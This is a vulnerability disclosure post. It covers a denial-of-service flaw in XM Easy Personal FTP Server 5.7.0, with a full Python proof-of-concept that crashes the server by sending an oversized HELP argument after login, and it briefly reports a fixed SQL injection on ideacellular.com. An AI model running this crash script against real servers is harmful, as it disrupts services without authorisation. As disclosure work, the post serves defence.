Category: Disclosures

XM Easy Personal FTP Server Multiple DoS vulnerabilities

Author: Neeraj Thakar

Link to the author’s post:

http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html

BID: http://www.securityfocus.com/bid/35239

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when a long list of arguments is sent to certain FTP commands post authentication.

Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a parameter to these commands, the FTP server cannot process it and it will crash. Note that this is a post authentication vulnerability, so user must be logged in to exploit the vulnerability. No registers are overwritten, hence remote code execution may not be possible.

Severity:
High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 – Vulnerability Discovered
05.15.2009 – Vendor Notified
05.20.2009 – No Response, Vendor Notified again
06.05.2009 – No Ack from Vendor, Public Disclosure

PoC: Python Exploit
—————————————————–
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:….[ XM Easy Personal FTP Server 5.7.0 ]…..
# [-] Where:…[ http://www.dxm2008.com ]…………….
# [-] When:….[ 14-May-2009 ]………………………
# [-] Who:…..[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]….
# [-] How:…..[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication……….]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]…………

import os
import sys
import time
from ftplib import FTP

def usage():
print “[…XM Personal FTP Server 5.7.0 DoS Exploit…]”
print “[………neeraj(.)thakar(at)gmail(.)com…………..]\n”
print “Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n”
print “\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n”

# The Main function starts here..
if __name__ == “__main__”:
ftpport = ’21’

# get the args..
if len(sys.argv) < 3:
usage()
sys.exit(1)
ftpserver = sys.argv[1]
user = sys.argv[2]
passwd = sys.argv[3]

print “Connecting to “+ftpserver+” using “+user+”….”,

# Try opening a connection to the FTP server
try:
F = FTP(ftpserver)
F.timeout = 3
if F:
print ‘Connected !’
except:
print “\nCould not connect to the Server :(\n”
sys.exit(1)

#Lets create the Buffer..
crap = “A” * 5000

# Creat’in da’bomb
dabomb = ‘HELP ‘+crap

print “Press any key to login..”
ch = sys.stdin.read(1)

# Lets login
try:
F.login(user, passwd)
except:
print “Oops.. Looks like you forgot to create a login !!\n”
F.quit()
sys.exit(1)
print “Target Locked, Press any key to fire..”,
ch = sys.stdin.read(1)

print ‘Sendin Da\’Bomb..’
try:
F.sendcmd(dabomb)
except:
print ‘Target destroyed !! Mission successfull..!’

print ‘Returning to base..’
F.close()
sys.exit(0)
—————————————————–

ideacellular.com SQL Injection Vulnerability

The corporate login option on Idea cellular website was vulnerable to SQL injection attack. It was reported to ideacellular staff on 17th March 2009 and fixed on 23rd March 2009. They had initially informed us that it will take them around 8 days to fix it, surprisingly they fixed it in 7 :-D, does it actually take that much time :-P.

For detailed information click here to download pdf.